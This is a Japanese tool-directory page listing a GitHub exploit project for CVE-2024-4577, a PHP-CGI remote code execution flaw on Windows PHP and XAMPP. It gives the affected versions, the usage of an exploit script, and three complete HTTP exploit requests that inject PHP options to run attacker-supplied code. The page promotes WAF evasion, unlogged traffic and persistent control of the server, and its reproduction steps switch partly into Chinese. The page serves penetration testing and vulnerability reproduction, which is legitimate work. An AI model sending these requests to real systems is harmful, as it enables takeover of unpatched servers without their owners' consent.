Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-4577-PHP-RCE — [脆弱性再現] 世界初のPHPデフォルト環境(XAMPP)を利用したCVE-2024-4577 PHP-CGI RCE 脆弱性 EXP。 | Kitploit
ツール/GitHubGitHub/xcanwin/cve-2024-4577-php-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用WAFバイパスペネトレーションテストペイロード開発
GitHubxcanwin/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

[脆弱性再現] 世界初のPHPデフォルト環境(XAMPP)を利用したCVE-2024-4577 PHP-CGI RCE 脆弱性 EXP。

リポジトリを見る
16233122年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-4577-PHP-RCE

プロジェクト概要と原理

  • PHPのデフォルト環境(XAMPP)を利用した世界初のCVE-2024-4577 PHP-CGI RCEエクスプロイト。
  • PHPデフォルト環境を利用した世界初のCVE-2024-4577 PHP-CGI RCEエクスプロイト。オリジナルエクスプロイトを共有し、SSRFをサポートし、WAFバイパスをサポートします。
  • PHPデフォルト環境でのRCEを実現。原理:cgi.force_redirect + REDIRECT-STATUS。
  • オリジナルの新しいEXPを追加し、WAFバイパスシナリオの手法をサポート。原理:FastCGIサーバー + FastCGIプロトコル通信。
  • オリジナルの新しいEXPを追加し、SSRFシナリオの手法をサポート。原理:data://プロトコル + GETリクエスト。

EXP 1 の利点

  • allow_url_include、auto_prepend_file、auto_append_file を必要とせずにRCE可能。任意のファイルやPHPファイルを含めることができます。
  • WAFが頻繁にブロックするキーワード allow_url_include、auto_prepend_file、auto_append_file が出現しません。
  • FastCGIサーバーのすべての通信はWAFに記録されません。
  • 新しいポートをリッスンするため、PHPサーバーを永続的に制御でき、ApacheやPHPから独立しています。

脆弱性概要

情報内容
脆弱性名PHP RCE
脆弱性IDCVE-2024-4577
リスクレベル高
脆弱性タイプRCE
悪用難易度低

影響を受けるバージョン

  • PHP Windows版 8.3.0 <= 影響を受けるバージョン < 8.3.8
  • PHP Windows版 8.2.0 <= 影響を受けるバージョン < 8.2.20
  • PHP Windows版 8.1.0 <= 影響を受けるバージョン < 8.1.29
  • PHP Windows版 影響を受けるバージョン == 8.0.x
  • PHP Windows版 影響を受けるバージョン == 7.x
  • PHP Windows版 影響を受けるバージョン == 5.x
  • XAMPP Windows版 8.2.0 <= 影響を受けるバージョン <= 8.2.12
  • XAMPP Windows版 8.1.0 <= 影響を受けるバージョン <= 8.1.25
  • XAMPP Windows版 影響を受けるバージョン == 8.0.x
  • XAMPP Windows版 影響を受けるバージョン == 7.x
  • XAMPP Windows版 影響を受けるバージョン == 5.x

EXP 1

WAFバイパスシナリオ + デフォルトシナリオで使用可能:

python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort

例:

python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80

EXP 2

SSRFシナリオ + デフォルトシナリオで使用可能:

http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 3

デフォルトシナリオで使用可能:

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost

<?php die("Te"."sT");?>

EXP 4

デフォルトシナリオで使用可能:

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN

<?php die("Te"."sT");?>

再現

  1. サーバー環境:
XAMPP Windows版 8.2.12
  1. サーバーにXAMPPをダウンロードしてインストール:
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1

或者自主去这里挑受影响版本:https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/

  1. サーバー設定
无需任何修改,保持默认配置
  1. クライアントでEXPを使用
使用上述EXP进行测试
  1. 検証
观察是否返回字符串 "TesT" 或者服务端system.ini文件内容
ツールをダウンロード